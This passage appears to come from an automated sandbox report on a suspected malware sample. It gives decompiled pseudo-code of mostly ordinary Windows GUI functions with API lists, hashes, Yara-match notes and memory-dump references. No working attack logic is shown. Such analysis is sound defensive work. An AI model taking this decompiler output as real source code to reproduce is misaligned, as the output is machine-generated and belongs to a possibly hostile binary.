							__eflags = _t227;
							if(_t227 == 0) {
								L24:
								_t102 = _t353 - 0xbc;
								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
								__eflags =  *_t102;
								goto L25;
							} else {
								_t230 = E0040A2E6(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
								__eflags = _t230;
								if(_t230 == 0) {
									goto L24;
								}
								CopyRect(_t353 - 0x68, _t353 - 0x10c);
								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
								E00408744( *((intOrPtr*)(E0040B917(_t353 - 0x3c, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
								_t240 = E0040B917(_t353 - 0x3c, _t351);
								_t241 = E0040B917(_t353 - 0x3c, _t351);
								 *_t241 = E00408791(_t353 - 0x4c,  *_t240);
								E00423E9D(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
								E0040A307( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
								_t249 = E0040B917(_t353 - 0x3c, _t351);
								_t250 = E0040B917(_t353 - 0x3c, _t351);
								 *_t250 = E00408791(_t353 - 0x4c,  *_t249);
								_t252 = E0040B917(_t353 - 0x3c, _t351);
								_t340 =  *(_t353 - 0x58);
								_t261 =  *(_t353 - 0x24);
								 *(_t353 - 0xbc) =  *_t252;
								L25:
								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
								_t351 = _t351 + 1;
								goto L28;
							}
						}
						E00413342(_t353 - 0x98,  *(_t353 - 0x54));
						E00422C3C( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
						E0040D8F0(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
						_t264 = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
						__eflags = _t351;
						if(__eflags <= 0) {
							L35:
							 *(_t353 - 4) = 5;
							E004239B0(_t353 - 0x3c);
							 *(_t353 - 4) = 4;
							E00422E73(_t264, _t353 - 0xac, 0, _t351, __eflags);
							 *(_t353 - 4) = 3;
							E00422E06(_t353 - 0x4c);
							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
							 *(_t353 - 4) = 0;
							E0040AED0(_t264, _t353 - 0x78, 0, _t351, __eflags);
							_t348 = 1;
							goto L6;
						} else {
							goto L32;
						}
						do {
							L32:
							_t314 =  *(E0040B917(_t353 - 0x3c, _t264));
							__eflags = _t314;
							if(_t314 != 0) {
								 *((intOrPtr*)( *_t314 + 4))(1);
							}
							_t264 = _t264 + 1;
							__eflags = _t264 - _t351;
						} while (__eflags < 0);
						goto L35;
					}
					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
						goto L7;
					}
					_t348 = E0040B10C(_t259, _t157, _t335, lstrlenA, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
					goto L6;
				}
			}





























                  0x0040b10c
                  0x0040b10c
                  0x0040b10c
                  0x0040b116
                  0x0040b11b
                  0x0040b121
                  0x0040b126
                  0x0040b12c
                  0x0040b13a
                  0x0040b13f
                  0x0040b145
                  0x0040b14b
                  0x0040b156
                  0x0040b166
                  0x0040b170
                  0x0040b62b
                  0x0040b62b
                  0x0040b1b5
                  0x0040b1bb
                  0x0040b1c7
                  0x0040b1c7
                  0x0040b176
                  0x0040b17b
                  0x00000000
                  0x0040b195
                  0x0040b197
                  0x0040b19e
                  0x0040b1ca
                  0x0040b1cd
                  0x0040b1d5
                  0x0040b1dd
                  0x0040b1e5
                  0x0040b1e9
                  0x0040b1ee
                  0x0040b1f7
                  0x0040b1fb
                  0x0040b206
                  0x0040b218
                  0x0040b21c
                  0x0040b226
                  0x0040b237
                  0x0040b23c
                  0x0040b246
                  0x0040b258
                  0x0040b263
                  0x0040b273
                  0x0040b279
                  0x0040b281
                  0x0040b283
                  0x0040b5ee
                  0x0040b5f4
                  0x0040b5f8
                  0x0040b600
                  0x0040b604
                  0x0040b60f
                  0x0040b617
                  0x0040b61a
                  0x0040b622
                  0x0040b626
                  0x00000000
                  0x0040b626
                  0x0040b289
                  0x0040b28b
                  0x00000000
                  0x00000000
                  0x0040b29d
                  0x0040b29f
                  0x00000000
                  0x00000000
                  0x0040b2a8
                  0x0040b2a8
                  0x0040b2ad
                  0x0040b2b7
                  0x0040b2ba
                  0x0040b2c8
                  0x0040b2d4
                  0x0040b2d6
                  0x0040b2d9
                  0x0040b2df
                  0x0040b2e4
                  0x0040b2e7
                  0x0040b301
                  0x0040b307
                  0x0040b309
                  0x00000000
                  0x00000000
                  0x0040b30b
                  0x0040b30d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040b30d
                  0x0040b311
                  0x0040b31c
                  0x0040b326
                  0x0040b334
                  0x0040b337
                  0x0040b33c
                  0x0040b34e
                  0x0040b352
                  0x0040b361
                  0x0040b370
                  0x0040b375
                  0x0040b536
                  0x0040b536
                  0x0040b539
                  0x00000000
                  0x00000000
                  0x0040b38b
                  0x0040b390
                  0x0040b394
                  0x0040b507
                  0x0040b509
                  0x0040b532
                  0x0040b532
                  0x0040b532
                  0x0040b533
                  0x00000000
                  0x0040b533
                  0x0040b50b
                  0x0040b515
                  0x0040b51f
                  0x0040b52c
                  0x00000000
                  0x0040b52c
                  0x0040b3a0
                  0x0040b3aa
                  0x0040b3af
                  0x0040b3b1
                  0x0040b3c8
                  0x0040b3b3
                  0x0040b3be
                  0x0040b3be
                  0x0040b3cf
                  0x0040b3d5
                  0x0040b3d7
                  0x0040b3e5
                  0x0040b3e5
                  0x0040b3d9
                  0x0040b3d9
                  0x0040b3dd
                  0x0040b3dd
                  0x0040b3ec
                  0x0040b3f1
                  0x0040b3f4
                  0x0040b3f6
                  0x0040b4e1
                  0x0040b4e1
                  0x0040b4e1
                  0x0040b4e1
                  0x00000000
                  0x0040b3fc
                  0x0040b409
                  0x0040b40e
                  0x0040b410
                  0x00000000
                  0x00000000
                  0x0040b421
                  0x0040b437
                  0x0040b455
                  0x0040b45e
                  0x0040b469
                  0x0040b47c
                  0x0040b48c
                  0x0040b4a1
                  0x0040b4aa
                  0x0040b4b5
                  0x0040b4ca
                  0x0040b4cc
                  0x0040b4d3
                  0x0040b4d6
                  0x0040b4d9
                  0x0040b4e8
                  0x0040b4eb
                  0x0040b4f4
                  0x0040b4fa
                  0x0040b504
                  0x00000000
                  0x0040b504
                  0x0040b3f6
                  0x0040b548
                  0x0040b557
                  0x0040b572
                  0x0040b57a
                  0x0040b57c
                  0x0040b57e
                  0x0040b580
                  0x0040b59d
                  0x0040b5a0
                  0x0040b5a4
                  0x0040b5af
                  0x0040b5b3
                  0x0040b5bb
                  0x0040b5bf
                  0x0040b5ca
                  0x0040b5d5
                  0x0040b5dd
                  0x0040b5e1
                  0x0040b5e8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040b582
                  0x0040b582
                  0x0040b58b
                  0x0040b58d
                  0x0040b58f
                  0x0040b595
                  0x0040b595
                  0x0040b598
                  0x0040b599
                  0x0040b599
                  0x00000000
                  0x0040b582
                  0x0040b1a0
                  0x0040b1a3
                  0x00000000
                  0x00000000
                  0x0040b1b3
                  0x00000000
                  0x0040b1b3

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040B116
                  • lstrlenA.KERNEL32(ReBarWindow32,00000174), ref: 0040B136
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B14B
                  • lstrlenA.KERNEL32(ToolbarWindow32), ref: 0040B242
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B258
                  • IntersectRect.USER32 ref: 0040B301
                  • _memset.LIBCMT ref: 0040B31C
                  • CreatePopupMenu.USER32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,@;E), ref: 0040B357
                  • CopyRect.USER32 ref: 0040B421
                  • OffsetRect.USER32(?,?,?), ref: 0040B437
                  • GetSysColor.USER32(00000004), ref: 0040B47E
                  • InsertMenuItemA.USER32(?,?,00000001,?), ref: 0040B52C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: @;E$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-254675463
                  • Opcode ID: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction ID: cf85aa8ededd028deaa69243dfe9d59f927a8dbf855ff73a4b859d4dc9167fbb
                  • Opcode Fuzzy Hash: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction Fuzzy Hash: CFE17C71900219ABDF15EBA1CC91EEEB778EF04308F10416EF916B72D2DB385A44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E632A, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 323libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E6E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ''X$:1F$CP^-$VIQZ$V`.$[s4+$`4TI$f$s9NQ$u,y$x5\$)n/$Hq$SUP
                  • API String ID: 1029625771-1276608707
                  • Opcode ID: 3093fb43f58e4485c7e8cd0b8b56c3c042fae31fe976a31e47ed5700ab0228f3
                  • Instruction ID: 7c6f7a3b790c61c9a0cb2f96642cecdecafc5226c7fd826daa307ddb59c96a69
                  • Opcode Fuzzy Hash: 3093fb43f58e4485c7e8cd0b8b56c3c042fae31fe976a31e47ed5700ab0228f3
                  • Instruction Fuzzy Hash: F742A5F08063698BDB659F429A897CDBB74BB11704F6096C8D25D3B224CB750BC6CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040E839, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0040E839(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E00412B38(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E0040C509(_t121, E0040C49C(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E00403AA0();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E0040C509(_t121, E0040C49C(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E00412D05(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                  0x0040e839
                  0x0040e839
                  0x0040e842
                  0x0040e845
                  0x0040e84d
                  0x0040e850
                  0x0040e855
                  0x0040e863
                  0x0040e875
                  0x0040e865
                  0x0040e868
                  0x0040e868
                  0x0040e87b
                  0x0040e87f
                  0x0040e88b
                  0x0040e893
                  0x0040e895
                  0x0040e895
                  0x0040e893
                  0x0040e857
                  0x0040e857
                  0x0040e857
                  0x0040e857
                  0x0040e897
                  0x0040e8a5
                  0x0040e8ae
                  0x0040e94e
                  0x0040e955
                  0x0040e95c
                  0x0040e966
                  0x0040e8b4
                  0x0040e8b6
                  0x0040e8bb
                  0x0040e8c6
                  0x0040e8cf
                  0x0040e8cf
                  0x0040e8c6
                  0x0040e8d1
                  0x0040e8da
                  0x0040e91b
                  0x0040e92a
                  0x0040e937
                  0x0040e8dc
                  0x0040e8dc
                  0x0040e8e3
                  0x0040e8e5
                  0x0040e8e5
                  0x0040e8f5
                  0x0040e908
                  0x0040e912
                  0x0040e912
                  0x0040e8da
                  0x0040e975
                  0x0040e97a
                  0x0040e97f
                  0x0040e983
                  0x0040e986
                  0x0040e98d
                  0x0040e997
                  0x0040e99f
                  0x0040e9a7
                  0x0040e9ae
                  0x0040e9b3
                  0x0040e9bb
                  0x0040e9bb
                  0x0040e9c1
                  0x0040e9c3
                  0x0040e9c3
                  0x0040e9ce
                  0x0040e9d6
                  0x0040e9d6
                  0x0040e9dc
                  0x0040e9de
                  0x0040e9de
                  0x0040e9f6

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040E868
                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0040E88B
                  • GetWindowRect.USER32 ref: 0040E8A5
                  • GetWindowLongA.USER32 ref: 0040E8BB
                  • CopyRect.USER32 ref: 0040E908
                  • CopyRect.USER32 ref: 0040E912
                  • GetWindowRect.USER32 ref: 0040E91B
                  • CopyRect.USER32 ref: 0040E937
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                  • String ID: (
                  • API String ID: 808654186-3887548279
                  • Opcode ID: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction ID: ae4a21a952a57d180e51b079893b1d30c26c389abd653013c1f1d069e54050a6
                  • Opcode Fuzzy Hash: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction Fuzzy Hash: 24514F72900219ABDB00DFAADD85EEEBBB9BF48314F154526F905F3290DB34E9118B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C904, Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 345COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041C904(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t172;
				long _t176;
				long _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				struct HBRUSH__* _t237;
				intOrPtr* _t242;
				intOrPtr _t247;
				signed int* _t274;
				intOrPtr* _t293;
				intOrPtr* _t296;
				intOrPtr _t329;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t345;
				signed int _t347;
				intOrPtr* _t353;
				intOrPtr _t358;
				int _t361;
				intOrPtr* _t362;
				int _t363;
				void* _t365;

				_push(0x78);
				_t172 = E00431A9B(E0044BA35, __ebx, __edi, __esi);
				_t296 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x8c)) == 0 ||  *((intOrPtr*)(__ecx + 0x98)) == 0) {
					L27:
					return E00431B73(_t172);
				} else {
					_t353 =  *((intOrPtr*)(_t365 + 8));
					E0041B41D(_t353, _t365 - 0x2c);
					 *((intOrPtr*)(_t365 - 0x38)) = 0;
					 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
					 *(_t365 - 4) = 0;
					_t176 = GetSysColor(6);
					_t8 = _t365 - 0x3c; // 0x452f3c
					E0041B3F9(_t8, 0, 2, _t176);
					 *(_t365 - 0x30) =  *(_t365 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
					 *(_t365 - 4) = 1;
					_t178 = GetSysColor(0x10);
					_t358 = 0;
					_t13 = _t365 - 0x34; // 0x452f3c
					E0041B3F9(_t13, 0, 3, _t178);
					 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x10)) = 1;
					 *((intOrPtr*)(_t365 - 0x10)) = 0;
					if( *((intOrPtr*)(_t296 + 0x118)) <= 0) {
						L26:
						_t162 = _t365 - 0x3c; // 0x452f3c
						E004230B1(_t162);
						_t163 = _t365 - 0x34; // 0x452f3c
						E004230B1(_t163);
						_t164 = _t365 - 0x34; // 0x452f3c
						 *(_t365 - 4) = 0;
						 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
						E0040ADD4(_t296, _t164, _t353, 0x452f3c, _t383);
						 *(_t365 - 4) =  *(_t365 - 4) | 0xffffffff;
						_t169 = _t365 - 0x3c; // 0x452f3c
						 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
						_t172 = E0040ADD4(_t296, _t169, _t353, 0x452f3c,  *(_t365 - 4));
						goto L27;
					} else {
						 *(_t365 - 0x14) =  *(_t365 - 0x14) & 0;
						goto L5;
						L12:
						 *(_t365 - 0x1c) = GetDeviceCaps(( *(_t296 + 0x90))[2], 0xa);
						SetRect( *((intOrPtr*)(_t296 + 0x134)) + 0x24, 0, 0, GetDeviceCaps(( *(_t296 + 0x90))[2], 8),  *(_t365 - 0x1c));
						E0041A5C8( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)) + 0x24);
						 *((intOrPtr*)( *_t353 + 0x1c))();
						_t361 =  *((intOrPtr*)(_t296 + 0xb0)) +  *(_t365 - 0x14);
						 *(_t365 - 0x1c) = _t361;
						if( *((intOrPtr*)(_t361 + 0x18)) == 0) {
							 *((intOrPtr*)( *_t296 + 0x194))( *((intOrPtr*)(_t365 - 0x10)));
							if( *((intOrPtr*)(_t296 + 0x10c)) != 0) {
								_t274 = E0041954D(_t296, _t365 - 0x44);
								 *(_t365 - 0x2c) =  ~( *_t274);
								 *(_t365 - 0x28) =  ~(_t274[1]);
								if( *((intOrPtr*)(_t296 + 0x80)) != 0) {
									GetClientRect( *(_t296 + 0x20), _t365 - 0x84);
									_t343 =  *((intOrPtr*)(_t296 + 0x68));
									if(_t343 <  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84)) {
										asm("cdq");
										 *(_t365 - 0x2c) =  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84) - _t343 - _t347 >> 1;
									}
									_t344 =  *((intOrPtr*)(_t296 + 0x6c));
									if(_t344 <  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80))) {
										asm("cdq");
										 *(_t365 - 0x28) =  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80)) - _t344 - _t347 >> 1;
									}
								}
							}
						}
						 *((intOrPtr*)( *_t353 + 0x34))(1);
						E004192C7(_t353, _t365 - 0x4c,  *(_t365 - 0x2c),  *(_t365 - 0x28));
						E00422AAE(_t353, _t365 - 0x54, 0, 0);
						 *((intOrPtr*)( *_t353 + 0x24))(5);
						_t83 = _t365 - 0x3c; // 0x452f3c
						E00423194(_t353, _t83);
						E0041B443(_t353, _t361);
						_t84 = _t365 - 0x34; // 0x452f3c
						E00423194(_t353, _t84);
						E00422BBC(_t353, _t365 - 0x5c,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 4)) + 3);
						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						E00422BBC(_t353, _t365 - 0x64,  *_t361 + 3,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t365 - 0x74) =  *(_t365 - 0x74) + 1;
						 *((intOrPtr*)(_t365 - 0x70)) =  *((intOrPtr*)(_t365 - 0x70)) + 1;
						 *((intOrPtr*)(_t365 - 0x6c)) =  *((intOrPtr*)(_t365 - 0x6c)) - 2;
						 *((intOrPtr*)(_t365 - 0x68)) =  *((intOrPtr*)(_t365 - 0x68)) - 2;
						_t237 = GetStockObject(0);
						_t362 =  *((intOrPtr*)(_t365 + 8));
						FillRect( *(_t362 + 4), _t365 - 0x74, _t237);
						 *((intOrPtr*)( *_t362 + 0x20))(0xffffffff);
						_t242 =  *((intOrPtr*)(_t296 + 0x134));
						_t353 =  *((intOrPtr*)(_t365 - 0x10));
						if( *((intOrPtr*)(_t242 + 0x10)) == 0) {
							L23:
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
							__eflags = _t353;
							if(_t353 == 0) {
								_t247 =  *((intOrPtr*)(_t296 + 0x114));
								__eflags = _t247 - 1;
								if(_t247 > 1) {
									__eflags = _t247 - 1;
									E0041BAC8(_t296, _t247 - 1, 1);
								}
							}
							goto L26;
						} else {
							_t329 =  *((intOrPtr*)(_t296 + 0x114));
							if(_t329 + _t353 > ( *( *((intOrPtr*)( *_t242 + 0x74)) + 0x1e) & 0x0000ffff)) {
								goto L23;
							}
							_t353 = _t353 + 1;
							 *((intOrPtr*)( *_t296 + 0x198))(_t329, _t353);
							_t363 =  *(_t365 - 0x1c);
							E0042DC27( *(_t296 + 0x90),  *((intOrPtr*)(_t363 + 0x18)),  *((intOrPtr*)(_t363 + 0x1c)));
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x74))(0xd, 0, 0, _t365 - 0x24);
							E0042D602( *(_t296 + 0x90), _t365 - 0x24);
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *_t363;
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *((intOrPtr*)(_t363 + 4));
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) + 1;
							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *(_t365 - 0x2c);
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) + 1;
							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *(_t365 - 0x28);
							E0042D9B9( *(_t296 + 0x90),  *((intOrPtr*)(_t365 - 0x24)),  *((intOrPtr*)(_t365 - 0x20)));
							E0042DB24( *(_t296 + 0x90));
							 *((intOrPtr*)( *( *(_t296 + 0x8c)) + 0x180))( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)));
							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
							 *(_t365 - 0x14) =  *(_t365 - 0x14) + 0x28;
							 *((intOrPtr*)(_t365 - 0x10)) = _t353;
							_t383 = _t353 -  *((intOrPtr*)(_t296 + 0x118));
							if(_t353 <  *((intOrPtr*)(_t296 + 0x118))) {
								_t353 =  *((intOrPtr*)(_t365 + 8));
								_t358 =  *((intOrPtr*)(_t365 - 0x10));
								L5:
								 *((intOrPtr*)(_t365 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x1c))();
								if(_t353 != 0) {
									_t186 =  *((intOrPtr*)(_t353 + 4));
								} else {
									_t186 = 0;
								}
								_t347 =  *( *(_t296 + 0x90));
								 *((intOrPtr*)(_t347 + 0x10))(_t186);
								 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x14)) =  *((intOrPtr*)(_t296 + 0x114)) + _t358;
								_t190 =  *((intOrPtr*)(_t296 + 0x114));
								if(_t190 + _t358 >= _t190) {
									_t345 = _t190 + _t358;
									if(_t345 >= _t358) {
										_t293 =  *((intOrPtr*)(_t296 + 0x134));
										_t347 =  *( *((intOrPtr*)( *_t293 + 0x74)) + 0x1e) & 0x0000ffff;
										if(_t345 <= _t347) {
											_t347 =  *( *(_t296 + 0x8c));
											 *((intOrPtr*)(_t347 + 0x160))( *(_t296 + 0x90), _t293);
										}
									}
								}
								goto L12;
							} else {
								goto L26;
							}
						}
					}
				}
			}

























                  0x0041c904
                  0x0041c90b
                  0x0041c910
                  0x0041c91a
                  0x0041cd40
                  0x0041cd45
                  0x0041c92c
                  0x0041c92c
                  0x0041c935
                  0x0041c93a
                  0x0041c93d
                  0x0041c944
                  0x0041c94f
                  0x0041c956
                  0x0041c959
                  0x0041c95e
                  0x0041c962
                  0x0041c96b
                  0x0041c96f
                  0x0041c974
                  0x0041c977
                  0x0041c97a
                  0x0041c985
                  0x0041c98c
                  0x0041c995
                  0x0041cd0d
                  0x0041cd0d
                  0x0041cd10
                  0x0041cd15
                  0x0041cd18
                  0x0041cd22
                  0x0041cd25
                  0x0041cd29
                  0x0041cd2c
                  0x0041cd31
                  0x0041cd35
                  0x0041cd38
                  0x0041cd3b
                  0x00000000
                  0x0041c99b
                  0x0041c99b
                  0x0041c99e
                  0x0041ca18
                  0x0041ca2b
                  0x0041ca4d
                  0x0041ca63
                  0x0041ca6c
                  0x0041ca78
                  0x0041ca7f
                  0x0041ca82
                  0x0041ca8f
                  0x0041ca9c
                  0x0041caa4
                  0x0041cab9
                  0x0041cabc
                  0x0041cabf
                  0x0041cacb
                  0x0041cada
                  0x0041cadf
                  0x0041caec
                  0x0041caf1
                  0x0041caf1
                  0x0041cafa
                  0x0041caff
                  0x0041cb09
                  0x0041cb0e
                  0x0041cb0e
                  0x0041caff
                  0x0041cabf
                  0x0041ca9c
                  0x0041cb17
                  0x0041cb26
                  0x0041cb35
                  0x0041cb40
                  0x0041cb43
                  0x0041cb49
                  0x0041cb51
                  0x0041cb56
                  0x0041cb5c
                  0x0041cb73
                  0x0041cb84
                  0x0041cb9a
                  0x0041cbab
                  0x0041cbb3
                  0x0041cbb4
                  0x0041cbb5
                  0x0041cbb6
                  0x0041cbb7
                  0x0041cbba
                  0x0041cbbd
                  0x0041cbc1
                  0x0041cbc7
                  0x0041cbd2
                  0x0041cbd8
                  0x0041cbe4
                  0x0041cbe7
                  0x0041cbf1
                  0x0041cbf4
                  0x0041ccda
                  0x0041cce2
                  0x0041ccf0
                  0x0041ccf3
                  0x0041ccf5
                  0x0041ccf7
                  0x0041ccfd
                  0x0041cd00
                  0x0041cd04
                  0x0041cd08
                  0x0041cd08
